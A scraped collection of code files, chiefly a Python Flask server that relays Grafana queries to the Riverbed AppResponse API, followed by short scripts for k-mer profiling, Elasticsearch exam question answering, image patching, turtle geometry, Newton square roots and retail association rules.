\"OK\"\n\n\n#########################################################################################################################\n## ##\n## HOST_GROUPS LIST RETRIEVING ##\n## ##\n#########################################################################################################################\n@serverFlask.route(\"/getHost_group\", methods = ['POST'])\ndef getHost_group():\n global lastTimeHostGroupListHasBeenPicked\n global hostGroupsList\n # If it has been less than 120 seconds since the last creation of the hostGroupsList, no query is made to Riverbed's API\n timeIsHostGroupsListOutdated = round((time.time() - lastTimeHostGroupListHasBeenPicked),0)\n if timeIsHostGroupsListOutdated < 120 :\n return jsonify(hostGroupsList)\n else :\n global currentToken\n # API for host_groups retrieving\n urlGET = 'https://'+HOST+'/api/npm.classification/2.0/hostgroups'\n # Retrieving hostgroups\n response = retrieveInformationFromAPI(userCredentials, urlGET)\n # Making a dict to easly access to the listing part\n dictionnaire = json.loads(response.text)\n # Field 'items' contains all host groups (name and id)\n valeurs = dictionnaire['items']\n hostGroupsList= []\n # For each host group, if enabled, add object{name, id} (angular will interpret it, user click on name but JS retrieves id) \n for value in valeurs:\n if value[\"enabled\"] :\n hostGroupsList.append({'text': value[\"name\"], 'value':str(value['id'])})\n lastTimeHostGroupListHasBeenPicked = time.time()\n return jsonify(hostGroupsList)\n\n\n#########################################################################################################################\n## ##\n## APPLICATIONS LIST RETRIEVING ##\n## ##\n#########################################################################################################################\n@serverFlask.route(\"/getApplicationOptions\", methods = ['POST'])\ndef getApplicationOptions():\n global lastTimeApplicationsListHasBeenPicked\n global applicationsList\n # If it has been less than 120 seconds since the last creation of the applicationsList, no query is made to Riverbed's API\n timeIsApplicationsListOutdated = round((time.time() - lastTimeApplicationsListHasBeenPicked),0)\n if timeIsApplicationsListOutdated < 120 :\n return jsonify(applicationsList)\n else :\n global currentToken\n # API for applications retrieving\n urlGET = 'https://'+HOST+'/api/npm.classification/2.0/applications'\n # Retrieving applications\n response = retrieveInformationFromAPI(userCredentials, urlGET)\n # Making a dict to easly access to the listing part\n parsed = json.loads(response.text)\n # Field 'items' contains all applications (name and id)\n valeurs = parsed['items']\n applicationsList= []\n # For each application, if enabled, add object{name, id} (angular will interpret it, user click on name but JS retrieves id)\n for value in valeurs:\n if value[\"enabled\"] :\n applicationsList.append({'text': value[\"name\"], 'value':str(value['id'])})\n lastTimeApplicationsListHasBeenPicked = time.time()\n return jsonify(applicationsList)\n\n\n#########################################################################################################################\n## ##\n## WEBAPPS LIST RETRIEVING ##\n## ##\n#########################################################################################################################\n@serverFlask.route(\"/getWebAppOptions\", methods = ['POST'])\ndef getWebAppOptions():\n global lastTimeWebAppsListHasBeenPicked\n global webAppsList\n # If it has been less than 120 seconds since the last creation of the webAppsList, no query is made to Riverbed's API\n timeIsWebAppsListOutdated = round((time.time() - lastTimeWebAppsListHasBeenPicked),0)\n if timeIsWebAppsListOutdated < 120 :\n return jsonify(webAppsList)\n else :\n global currentToken\n # API for WebApps retrieving\n urlGET = 'https://'+HOST+'/api/npm.wta_config/1.0/wta_webapps'\n # Retrieving WebApps\n response = retrieveInformationFromAPI(userCredentials, urlGET)\n # Making a dict to easly access to the listing part\n parsed = json.loads(response.text)\n # Field 'items' contains all WebApps (name and id)\n valeurs = parsed['items']\n webAppsList= []\n # For each WebApp, add object{name, id} (angular will interpret it, user click on name but JS retrieves id)\n for value in valeurs:\n webAppsList.append({'text': value[\"name\"], 'value':str(value['id'])})\n lastTimeWebAppsListHasBeenPicked = time.time()\n return jsonify(webAppsList)\n\n\n#########################################################################################################################\n## ##\n## METRICS LIST RETRIEVING ##\n## ##\n#########################################################################################################################\n# Metrics for hostgroups\n@serverFlask.route(\"/metricsHG\", methods = ['POST'])\ndef metricsHG():\n global lastTimemetricsHostGroupListHasBeenPicked\n global metricsHostGroupList\n # If it has been less than 120 seconds since the last creation of the metricsHostGroupList, no query is made to Riverbed's API\n timeIsMetricsHostGroupListOutdated = round((time.time() - lastTimemetricsHostGroupListHasBeenPicked),0)\n if timeIsMetricsHostGroupListOutdated < 120 :\n return jsonify(metricsHostGroupList)\n else :\n global currentToken\n # API for aggregate metrics retrieving\n urlGET = 'https://'+HOST+'/api/npm.reports.sources/1.0/sources/items/aggregates'\n # Retrieving metrics for aggregate source type\n response = retrieveInformationFromAPI(userCredentials, urlGET)\n # Making a dict to easly access to the listing part\n parsed = json.loads(response.text)\n # Field 'columns' contains metrics\n valeurs = parsed['columns']\n metricsHostGroupList= []\n # Pushing metrics in array, exepting not calculable metrics and not RTP metrics (not relevant)\n for value in valeurs:\n if not value[\"id\"].endswith('.id') and not value[\"id\"].endswith('_id') and \\\n not value[\"id\"].endswith('.name') and not value[\"id\"].endswith('_name') and \\\n not value[\"id\"].endswith('.ip') and not value[\"id\"].endswith('_ip') and \\\n not value[\"id\"].endswith('.dns') and not value[\"id\"].endswith('_dns') and \\\n not value[\"id\"].endswith('.type') and not value[\"id\"].endswith('_type') and \\\n not value[\"id\"].endswith('start_time') and not value[\"id\"].endswith('end_time') and \\\n not \"rtp\" in value[\"id\"]:\n # If metric has no unit then diplay 'occurence' instead of 'none'\n if value[\"unit\"]=='none':\n unit = 'occurence'\n else :\n unit = value[\"unit\"]\n # If rate is available display unit/rate\n try:\n # For each metric, add object{label (unit/rate), id} (angular will interpret it, user click on name but JS retrieves id)\n metricsHostGroupList.append({'text': value[\"label\"]+\" (\"+unit+\"/\"+value[\"rate\"]+\")\", 'value':value['id']})\n # Else just display unit\n except KeyError as e:\n # or add object{label (unit), id} if rate is not applicable (angular will interpret it, user click on name but JS retrieves id)\n metricsHostGroupList.append({'text': value[\"label\"]+\" (\"+unit+\")\", 'value':value['id']})\n # only id displayed : \n # metricsHostGroupList.append([value[\"id\"], value['unit']])\n lastTimemetricsHostGroupListHasBeenPicked = time.time()\n return jsonify(metricsHostGroupList)\n\n\n# Metrics for application\n@serverFlask.route(\"/metricsApplication\", methods = ['POST'])\ndef metricsApplications():\n global lastTimeMetricsApplicationListHasBeenPicked\n global metricsApplicationList\n # If it has been less than 120 seconds since the last creation of the metricsApplicationList, no query is made to Riverbed's API\n timeIsMetricsApplicationListOutdated = round((time.time() - lastTimeMetricsApplicationListHasBeenPicked),0)\n if timeIsMetricsApplicationListOutdated < 120 :\n return jsonify(metricsApplicationList)\n else :\n global currentToken\n # API for aggregate metrics retrieving\n urlGET = 'https://'+HOST+'/api/npm.reports.sources/1.0/sources/items/aggregates'\n # Retrieving metrics for aggregate\n response = retrieveInformationFromAPI(userCredentials, urlGET)\n # Making a dict to easly access to the listing part\n parsed = json.loads(response.text)\n # Field 'columns' contains metrics\n valeurs = parsed['columns']\n metricsApplicationList= []\n # Pushing metrics in array, exepting not calculable metrics and not RTP, web (not relevant)\n for value in valeurs:\n if not value[\"id\"].endswith('.id') and not value[\"id\"].endswith('_id') and \\\n not value[\"id\"].endswith('.name') and not value[\"id\"].endswith('_name') and \\\n not value[\"id\"].endswith('.ip') and not value[\"id\"].endswith('_ip') and \\\n not value[\"id\"].endswith('.dns') and not value[\"id\"].endswith('_dns') and \\\n not value[\"id\"].endswith('.type') and not value[\"id\"].endswith('_type') and \\\n not value[\"id\"].endswith('start_time') and not value[\"id\"].endswith('end_time') and \\\n not \"rtp\" in value[\"id\"] and not \"web\" in value[\"id\"] and \\\n not \"p2m\" in value[\"id\"] and not \"m2p\" in value[\"id\"] : \n # If metric has no unit then diplay 'occurence' instead of 'none'\n if value[\"unit\"]=='none':\n unit = 'occurence'\n else :\n unit = value[\"unit\"]\n # If rate is available display unit/rate\n try:\n # For each metric, add object{label (unit/rate), id} (angular will interpret it, user click on name but JS retrieves id)\n metricsApplicationList.append({'text': value[\"label\"]+\" (\"+unit+\"/\"+value[\"rate\"]+\")\", 'value':value['id']})\n # Else just display unit\n except KeyError as e:\n # or add object{label (unit), id} if rate is not applicable (angular will interpret it, user click on name but JS retrieves id)\n metricsApplicationList.append({'text': value[\"label\"]+\" (\"+unit+\")\", 'value':value['id']})\n lastTimeMetricsApplicationListHasBeenPicked = time.time()\n return jsonify(metricsApplicationList)\n\n\n# Metrics for WebApps\n@serverFlask.route(\"/metricsWebApp\", methods = ['POST'])\ndef metricsWebbApp():\n global lastTimeMetricsWebAppListHasBeenPicked\n global metricsWebAppList\n # If it has been less than 120 seconds since the last creation of the metricsHostGroupList, no query is made to Riverbed's API\n timeIsMetricsWebAppListOutdated = round((time.time() - lastTimeMetricsWebAppListHasBeenPicked),0)\n if timeIsMetricsWebAppListOutdated < 120 :\n return jsonify(metricsWebAppList)\n else :\n \n global currentToken\n # API for aggregate metrics retrieving\n urlGET = 'https://'+HOST+'/api/npm.reports.sources/1.0/sources/items/aggregates'\n # Retrieving metrics for aggregates\n response = retrieveInformationFromAPI(userCredentials, urlGET)\n # Making a dict to easly access to the listing part\n parsed = json.loads(response.text)\n # Field 'columns' contains metrics\n valeurs = parsed['columns']\n metricsWebAppList= []\n # Pushing metrics in array, exepting not calculable metrics\n print(\"Ajout des valeurs de Riverbed dans un JSON\")\n for value in valeurs:\n if not value[\"id\"].endswith('.id') and not value[\"id\"].endswith('_id') and \\\n not value[\"id\"].endswith('.name') and not value[\"id\"].endswith('_name') and \\\n not value[\"id\"].endswith('.ip') and not value[\"id\"].endswith('_ip') and \\\n not value[\"id\"].endswith('.dns') and not value[\"id\"].endswith('_dns') and \\\n not value[\"id\"].endswith('.type') and not value[\"id\"].endswith('_type') and \\\n not value[\"id\"].endswith('start_time') and not value[\"id\"].endswith('end_time') and \\\n \"web\" in value[\"id\"] :\n # If metric has no unit then diplay 'occurence' instead of 'none'\n if value[\"unit\"]=='none':\n unit = 'occurence'\n else :\n unit = value[\"unit\"]\n # If rate is available display unit/rate\n try:\n # For each metric, add object{label (unit/rate), id} (angular will interpret it, user click on name but JS retrieves id)\n metricsWebAppList.append({'text': value[\"label\"]+\" (\"+unit+\"/\"+value[\"rate\"]+\")\", 'value':value['id']})\n # Else just display unit\n except KeyError as e:\n # or add object{label (unit), id} if rate is not applicable (angular will interpret it, user click on name but JS retrieves id)\n metricsWebAppList.append({'text': value[\"label\"]+\" (\"+unit+\")\", 'value':value['id']})\n lastTimeMetricsWebAppListHasBeenPicked = time.time()\n return jsonify(metricsWebAppList)\n\n\n#########################################################################################################################\n## ##\n## FAMILY PAGES LIST RETRIEVING ##\n## ##\n#########################################################################################################################\n# Cannot get page.family.id from API, getting all pages requested for 24 hours (large granularity for light query)\n@serverFlask.route(\"/getPageFamilyOptions\", methods = ['POST'])\ndef getPageFamilyOptions():\n # This global variable is set when picking a source in /query\n global globalAllRowSourceIDs\n # Retrieving JSON from Grafana in order to extract row letter (and number)\n grafanaData = request.get_json()\n # Letter from Grafana's row (converted to integer, alphabetical position)\n currentRowLetter = grafanaData['target'].lower()\n currentRowNumber = string.lowercase.index(grafanaData['target'].lower())\n sourceID = globalAllRowSourceIDs[currentRowNumber]\n if sourceID == 0:\n return \"0\"\n\n dataDefs = {'data_defs': [\n {\n \"source\": {\n \"origin\": \"\",\n \"path\": 'aggregates:App',\n \"type\": \"\",\n \"name\": \"aggregates\"\n },\n \"time\": {\n \"duration\": \"last 24 hours\",\n \"granularity\": \"86400\",\n },\n \"group_by\": [\n \"start_time\",\n \"app.id\"\n ],\n \"columns\": [\n \"app.name\",\n \"app.id\",\n \"start_time\",\n \"sum_web.pages\",\n \"web.page.family.id\",\n \"web.page.family.name\"\n ],\n \"filters\": [\n {\n \"value\": \"app.id == \"+sourceID,\n \"type\": \"STEELFILTER\",\n \"id\": \"rowFilter\"\n }]\n }\n ]}\n\n # dataDefs to json conversion \n dataDefsJSON = json.dumps(dataDefs)\n # Sending request and credentials to Riverbed\n responseSync = createSyncInstance(userCredentials, dataDefsJSON)\n # Response is parsed in order to access some fields\n parsed = json.loads(responseSync.text)\n # Trying to get results, if no result returns '0'\n try:\n allPageFamily = parsed['data_defs'][0][\"data\"]\n except KeyError as e:\n return \"0\"\n \n # Resetting the list in case of multiple page family row\n pageFamilyList = []\n for eachPageFamily in allPageFamily:\n # position in array from 0 to 5 : app.name, app.ip, timestamp, page.views, page.family.id, page.family.name\n pageID = str(eachPageFamily[4])\n pagename = str(eachPageFamily[5])\n # encoding is 99% sure useless\n pagename = pagename.encode()\n pagename.encode(encoding=\"ascii\",errors=\"backslashreplace\")\n # Keep both id and name, id will be extracted in /query\n pageFamilyIDandName = pagename + '@' + pageID\n pageFamilyList.append(pageFamilyIDandName)\n return jsonify(pageFamilyList)\n\n\n#########################################################################################################################\n## ##\n## RETRIEVING GRAFANA'S JSON && SENDING TO RIVERBED && SENDING RIVERBED RESPONSE ##\n## ##\n#########################################################################################################################\n@serverFlask.route(\"/query\", methods = ['POST'])\ndef query():\n ##################################################################\n ## Gathering Grafana's data ##\n ##################################################################\n # This global variable is dedicated to page family gathering (route /getPageFamilyOptions\")\n # It contains all of (route /getPageFamilyOptions\")\n global globalAllRowSourceIDs\n # List returned to Grafana, contains results\n dataPointsForGrafana = []\n # Variable for debug purpose, distinguishing value 0 and no value\n notDEFINEalarm = 0\n\n # Catch the JSON sent by Grafana \n grafanaFieldsForQuery = request.get_json()\n\n # If you need to debug, enable this 3 lines, show JSON sent by Grafana to Python endpoint\n # print('\\n\\n\\n###### BEGIN : JSON BUILT BY GRAFANA #######')\n # print(json.dumps(grafanaFieldsForQuery, indent=4, sort_keys=True))\n # print('###### END : JSON BUILT BY GRAFANA #######\\n\\n\\n')\n\n # For each row of Grafana query (A, B, C, D...)\n for currentTarget in grafanaFieldsForQuery['targets']:\n\n # RefId is identification for one row in Grafana (A, B, C ...) automaticly created by Grafana\n grafanaRefId = currentTarget['refId']\n grafanaRefIdNumber = string.lowercase.index(grafanaRefId.lower())\n\n # sourceID is one of host_group.id, app.id (default is '')\n try:\n sourceID = currentTarget['targetID']\n except KeyError as e:\n continue\n \n globalAllRowSourceIDs[grafanaRefIdNumber] = sourceID\n\n # SourceType is one of Host_group, Application, Application/HG, WebApp or PageFamily (combobox)\n sourceType = currentTarget['type']\n\n # Retrieving times queried from Grafana's JSON (string epoch format needed)\n queryTimeFrom = str(convert_to_epoch(grafanaFieldsForQuery['range']['from']))\n queryTimeTo = str(convert_to_epoch(grafanaFieldsForQuery['range']['to']))\n\n # Retrieving metric queried by Grafana (default is '')\n metricQueried = currentTarget['metricID']\n\n # Retrieving specified granularity, if granularity has not been set yet, the query is not ready (moving to next target . . .)\n try:\n granularityQueried = str(currentTarget['granularity'])\n except KeyError as e:\n granularityQueried = ''\n if granularityQueried == '':\n continue \n\n ##################################################################\n ## Building AppResponse query ##\n ##################################################################\n # Declaring all fields needed for a Riverbed creating instance request (data_defs)\n # If query is not ready, we stop here for this currentTarget, or Grafana will crash (due to Python error, route gives err500)\n if sourceType == 'Host group':\n # A host group query requires both a source and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '':\n continue\n tableauSource = {\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"host_group.id\"]\n tableauColumns = [\"start_time\", \"host_group.id\", \"host_group.name\", metricQueried]\n filters_value1= \"host_group.id == \"+sourceID\n # filters_value2 is only used in Application/HG query\n filters_value2=\"\"\n\n if sourceType == \"Application\" :\n # A application query requires both a source and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '':\n continue\n tableauSource = {\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"app.id == \"+sourceID\n # filters_value2 is only used in Application/HG query\n filters_value2=\"\"\n\n if sourceType == \"Application/HG\" :\n # A Application/HG query requires both a source (application), another source (host group) ,and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '' or currentTarget['secondTargetID'] =='':\n continue\n tableauSource = {\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"app.id == \"+sourceID\n filters_value2= \"host_group.id == \"+currentTarget['secondTargetID']\n\n if sourceType == 'WebApp':\n # A WebApp query requires both a source and a metric (granularity has already been checked)\n if sourceID == '' or metricQueried == '':\n continue\n tableauSource = {\n \"origin\": \"\",\n \"path\": \"aggregates:App\",\n \"type\": \"\",\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"app.id == \"+sourceID\n # filters_value2 is only used in Application/HG query\n filters_value2=\"\"\n if sourceType == 'PageFamily':\n familyPageID = currentTarget['pageFamilyID']\n # Extracting id\n familyPageID = familyPageID.split('@')\n familyPageID=familyPageID[1]\n # A PageFamily query requires both a source (id of page), and a metric (granularity has already been checked)\n if metricQueried == '' or familyPageID =='':\n continue\n tableauSource = {\n \"origin\": \"\",\n \"path\": \"aggregates:App\",\n \"type\": \"\",\n \"name\": \"aggregates\"\n }\n tableauGroupBy = [\"start_time\", \"app.id\"]\n tableauColumns = [\"start_time\", \"app.id\", \"app.name\", metricQueried]\n filters_value1= \"web.page.family.id == \"+familyPageID\n filters_value2=\"\"\n\n # Implementing fields in data definition for Riverbed\n # Commentaries of the following object come from Riverbed support's documentation\n # The data definition (request) has the following properties: source, time, group_by, and filters\n dataDefs = {'data_defs': [\n {\n # Data source to handle the data request. The source property is an object\n # It has the following required sub-properties: name (required) and path (optional)\n 'source': tableauSource,\n # Specify the time duration of the data requests\n # The time property also includes a few properties that help refine time-series requests.\n \"time\": {\n # Epoch start time of the request, the start time is inclusive, the unit is seconds.\n \"start\": queryTimeFrom,\n # Epoch end time of the request, the end time is exclusive, the unit is seconds.\n \"end\": queryTimeTo,\n # This refers to the amount of time for which the data source computes a summary of the metrics it received\n # The data source examines all data and creates summaries for 1 minute, 5 minutes, 1 hour, 6 hours, and 1 day\n 'granularity' : granularityQueried,\n },\n # The group by property specifies the keys in the request. It is usually used to determine what kind of data is requested\n # If the start_time (or end_time) column is in the group_by, then the request is considered time series\n \"group_by\": tableauGroupBy,\n # Request columns, the client can specify the requested key/metric columns, as well as their order\n \"columns\": tableauColumns,\n # The filters property is an array with filter objects (STEELFILTER is default filter)\n \"filters\": [\n {\n \"type\": \"STEELFILTER\",\n \"value\": filters_value1\n },\n {\n \"type\": \"STEELFILTER\",\n \"value\": filters_value2\n } ]\n }]}\n\n # Converting data_defs in JSON, JSON format is required by Riverbed AppResponse server\n dataDefsJSON = json.dumps(dataDefs)\n \n # Query is now ready to be sent to RiverBed AppResponse probe\n\n # Measuring time needed to Riverbed for datapoints collection (if time>50s then sync mode returns no data but still continue to collect data queried)\n # Important thing is, datapoints collection is still running, even if API does not return the result (when collection is over, datapoints can be manually retrieve with instance ID)\n # Multiple request > 50s may overload the probe, keep it in mind\n timeSyncStart = time.time()\n # Sending datadefs to Riverbed and waiting for response\n syncReportFromRiverbed = createSyncInstance(userCredentials, dataDefsJSON)\n # Save collection time, if no datapoints are found in 'syncReportFromRiverbed' then timeToCollection will be check [NOT IMPLEMENTED]\n timeToCollection = round((time.time() - timeSyncStart),2)\n\n# If you need to debug, enable this 3 lines, showing JSON results sent by AppResponse\n # print('\\n\\n\\n###### DEBUT RIVERBED JSON #######')\n # print(json.dumps(syncReportFromRiverbed.json(), indent=4, sort_keys=True))\n # print('###### FIN RIVERBED JSON #######\\n\\n\\n')\n\n\n ##################################################################\n ## Gathering AppResponse's data ##\n ##################################################################\n # Response is parsed in order to access some fields\n parsedReport = json.loads(syncReportFromRiverbed.text)\n\n # WORKING BUT NO MORE DIFFERENCE BETWEEN VALUE=0 AND NO VALUE\n # Get it off for debug purpose\n try:\n parsedReport[\"data_defs\"][0]['data']\n except KeyError as e:\n print(\"##### NO DATA POINT #####\")\n continue\n\n # caption will be the curve's caption\n caption = parsedReport[\"data_defs\"][0]['data'][0][2]\n\n # Label contains both caption and metric name\n label = caption +' : '+ metricQueried\n\n # valeurs is a list containing summary data from Riverbed AppResponse probe\n valeurs = parsedReport[\"data_defs\"][0]['data']\n\n # Datapoint is a list which will receive all datapoints in correct format [value, timestamp]\n datapoints = []\n\n # Filling datapoints\n for value in valeurs:\n # Timestamp is at position value[0] in unicode type, converting to int in milliseconde (*1000)\n # Adding 60 seconds to synchronize probe's clock and Grafana's clock\n timeStampInteger= (int(value[0])+60)*1000\n\n # Depending to the format of the result\n if type(value[3]) == type(unicode()) :\n try:\n # Change unicode to float\n res = float(value[3])\n except ValueError as e:\n # Encountering '#N/D' which means data cannot be retrieved\n notDEFINEalarm = 1\n res = 0\n # Change int to float\n if type(value[3]) == type(int()) :\n res = float(value[3])\n # Change string to float \n if type(value[3]) == type(str()) :\n res = float(value[3])\n # No change if float encountered\n if type(value[3]) == type(float()) :\n res = value[3]\n # Adding couple [value, timestamp] to datapoints list\n datapoints.append([res,timeStampInteger])\n\n # Object representating each row's of Grafana (contains caption, meta informations, row's id, collection time, and datapoints)\n newTarget = {\n # target is curve's caption\n \"target\": label,\n # meta is miscellaneous informations\n \"meta\" : { 'info 1' : \"nothing\"},\n # refId is the letter of the row (A, B, C, D ...)\n 'refId' : grafanaRefId,\n # collectionTime is the time needed to complete the query, sync must be <50 [REQUIRE MORE THAN DATASOURCE PLUGIN TO BE USEFUL]\n 'collection time' : timeToCollection,\n # datapoints is a list containing all points retrieved by Riverbed AppResponse probe\n \"datapoints\": datapoints \n }\n # Each target (or row) is insert into a list (will be send to Grafana)\n dataPointsForGrafana.append(newTarget)\n \n # For debug purpose, warning if not define encountered\n if notDEFINEalarm == 1 :\n print('################################# = <#N/D> ALARM ################################################')\n\n # Finaly, sending data to Grafana in JSON format\n return jsonify(dataPointsForGrafana) \n\n# Server started, accepts external connection on port 0000, debug set to false in oreder to avoid security issue\nif (__name__ == \"__main__\"):\n serverFlask.run(host = '0.0.0.0', port = 0000, debug=False)","repo_name":"Crinon/outDated-Grafana-Datasource-Plugin-For-Riverbed-AppResponse","sub_path":"flaskServerAppResponseForGrafana.py","file_name":"flaskServerAppResponseForGrafana.py","file_ext":"py","file_size_in_byte":38784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5935539951","text":"def pr(text, profile):\r\n k = len(text)\r\n pro = 1.0\r\n for i in range(k):\r\n pro *= profile[text[i]][i]\r\n return pro\r\n\r\n\r\ndef profile_most_probable_kmer(text, k, profile):\r\n loop = len(text) - k + 1\r\n score = -1\r\n proba = ''\r\n for i in range(loop):\r\n pattern = text[i:i+k]\r\n patty = pr(pattern, profile)\r\n if patty > score:\r\n proba = pattern\r\n score = patty\r\n return proba\r\n\r\n\r\nprofil = {'A': [0.125, 0.125, 0.25], 'C': [0.5, 0.375, 0.125], 'G': [0.125, 0.125, 0.25], 'T': [0.25, 0.375, 0.375]}\r\nkmer = []\r\nfor i in range(4):\r\n pat = input()\r\n kmer.append(profile_most_probable_kmer(pat, 3, profil))\r\nfor m in kmer:\r\n print(m)\r\n\r\n","repo_name":"Marzan1/Biology-Meets-Programming","sub_path":"profile_most_probable_kmer.py","file_name":"profile_most_probable_kmer.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3786996684","text":"import argparse, elasticsearch, json, re\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\ndef overlap(a,b,stopwords):\n filtered_a = set([ x.lower() for x in re.sub(r'\\W+', ' ', a).split() ]) - stopwords\n filtered_b = set([ x.lower() for x in re.sub(r'\\W+', ' ', b).split() ]) - stopwords\n\n return filtered_a & filtered_b\n\ndef load_stopwords():\n sw = []\n with open('../stopwords-pt.txt', 'r') as f:\n for l in f:\n sw.append(l.strip())\n return set(sw)\n\ndef oab_questions(es):\n doc = {\n 'size' : 5000,\n 'query': {\n 'match_all' : {}\n }\n }\n\n res = es.search(index=\"oab\", doc_type='doc', body=doc)\n\n for r in res['hits']['hits']:\n yield r['_source']\n\ndef search_corpus(es, search_text):\n query = {\n 'query': {\n 'match': {\n 'text': search_text\n }\n }\n }\n\n res = es.search(index=\"corpus\", doc_type=\"sentence\", body=query)\n\n score = res['hits']['hits'][0]['_score']\n text = res['hits']['hits'][0]['_source']['text']\n filename = res['hits']['hits'][0]['_source']['filename']\n return (score, text, filename)\n\ndef main():\n es = Elasticsearch(['http://localhost:9200/'])\n\n sw = load_stopwords()\n\n for q in oab_questions(es):\n oab_enum = q['enum'].replace('\\n', ' ')\n oab_filename = q['filename']\n oab_number = q['number']\n oab_options = q['options']\n\n max_score = 0\n selected_option = { 'letter': '?', 'text': 'N/A', 'correct': None }\n justification = \"N/A\"\n\n for o in oab_options:\n enum_plus_option = oab_enum + ' ' + o['text']\n\n (score, text, filename) = search_corpus(es, enum_plus_option)\n\n if len(overlap(enum_plus_option, text, sw)) > 0:\n if score > max_score:\n max_score = score\n selected_option = o\n justification = \"[{}] {}\".format(filename, text)\n\n row = [oab_filename, oab_number,\n oab_enum, selected_option['letter'], selected_option['text'], justification, str(selected_option['correct'])]\n print(\"\\t\".join(row))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pdelfino/oab-exams","sub_path":"experiments/IR/ir.py","file_name":"ir.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"28048052887","text":"# Homework 1, Task 1 - Divide an image in patches and saves them to the disk as a patch with series names\n\nimport cv2 as cv\n\nimage = cv.imread('image.jpg') # reading image from directory\n\nimage_height = image.shape[0] # put image's height to variable\nimage_width = image.shape[1] # put image's width to variable\n\nm = int(image_height / 3) # how many patches is needed to divide an image\nn = int(image_width / 3)\n\nk = 100\n\n# dividing an image to patches, and saving them to images\nfor y in range(0, image_height, m):\n for x in range(0, image_width, n):\n if (image_height - y) < m or (image_width - x) < n:\n break\n\n x1 = x + n\n y1 = y + m\n\n if x1 >= image_width and y1 >= image_height:\n x1 = image_width - 1\n tiles = image[y:y + m, x:x + n]\n cv.imwrite('saved_patches/' + str(k + 3) + '.jpg', tiles)\n cv.rectangle(image, (x, y), (x1, y1), (0, 255, 0), 1)\n elif y1 <= image_height:\n y1 = image_height - 1\n tiles = image[y:y + m, x:x + n]\n cv.imwrite('saved_patches/' + str(k + 3) + '.jpg', tiles)\n cv.rectangle(image, (x, y), (x1, y1), (0, 255, 0), 1)\n\n k += 1\n","repo_name":"MustafinMaksim/fundamentals-of-robotics","sub_path":"Homework 1/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31798797749","text":"import math\n\nstyle = ('Courier', 20, 'italic') \n\ndef squared(x):\n return x * x\n\ndef start(board, turtle):\n board.reset()\n # Given Side, solve for Area and Perimeter\n turtle.title(\"Parallelogram\")\n\n a = board.screen.numinput(\"Given\", \"Enter a\")\n b = board.screen.numinput(\"Given\", \"Enter b\")\n\n board.home()\n board.forward(b)\n\n board.home()\n board.left(60)\n board.forward(a)\n board.right(60)\n board.forward(b)\n board.right(120)\n board.forward(a)\n board.penup()\n\n baseCenter = (b/2)\n board.goto(baseCenter, -20) # y at -20 units writes outside the triangle\n board.write('b', font=style, align='left') # a label at the base\n\n board.goto(-250, 100)\n board.write('a = {}'.format(a), font=style, align='left')\n board.goto(-250, 80)\n board.write('b = {}'.format(b), font=style, align='left')","repo_name":"meriampdev/python-geometry","sub_path":"quadrilaterals/Parallelogram.py","file_name":"Parallelogram.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9713486239","text":"x = int(input(\"Enter number \"))\nguess = 1.0\n#while ((guess*guess - x) > 0.00001) or ((x - guess*guess) > 0.00001):\nwhile abs(guess**2 - x) > 0.00001:\n\tguess = (guess + x/guess)/2\n\tprint (\"Intermediate result: \",guess)\n\t\nprint (\"-\"*10,\"\\nFinal Result: \",guess,\"\\n\",\"-\"*10, sep='')\n\n# Do the same thing, but in a function\ndef sqrt_guess(x):\n\tguess = 1.0\n\twhile abs(guess**2 - x) > 0.00001:\n\t\tguess = (guess + x/guess)/2\n\treturn guess\n\n# Invoke the function and print the result\t\nprint(\"\\n{:5.3f} returned by function\".format(sqrt_guess(x)))\n","repo_name":"mcgettin/ditOldProgramming","sub_path":"yr2/sem1/sample-programs/sqrtNewton3.py","file_name":"sqrtNewton3.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11135457840","text":"##### Data Understanding\n\n# Importing Libraries\nimport pandas as pd\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\npd.set_option('display.width', 500)\npd.set_option('display.expand_frame_repr', False)\nfrom mlxtend.frequent_patterns import apriori, association_rules\n\n\n# Importing Data\n\ndf = pd.read_excel(\"datasets/online_retail_II.xlsx\", sheet_name=\"Year 2010-2011\")\n\n\n##### Descriptive Statistics\n\ndf.shape # Dimension of dataframe\n\ndf.dtypes # Data type of each variable\n\ndf.info # Print a concise summary of a DataFrame\n\ndf.head() # First 5 observations of dataframe\n\ndf.tail() # Last 5 observations of dataframe\n\n\n\ndef outlier_thresholds(dataframe, variable):\n quartile1 = dataframe[variable].quantile(0.01)\n quartile3 = dataframe[variable].quantile(0.99)\n interquantile_range = quartile3 - quartile1\n up_limit = quartile3 + 1.5 * interquantile_range\n low_limit = quartile1 - 1.5 * interquantile_range\n return low_limit, up_limit\n\ndef replace_with_thresholds(dataframe, variable):\n low_limit, up_limit = outlier_thresholds(dataframe, variable)\n dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\n dataframe.loc[(dataframe[variable] > up_limit), variable] = 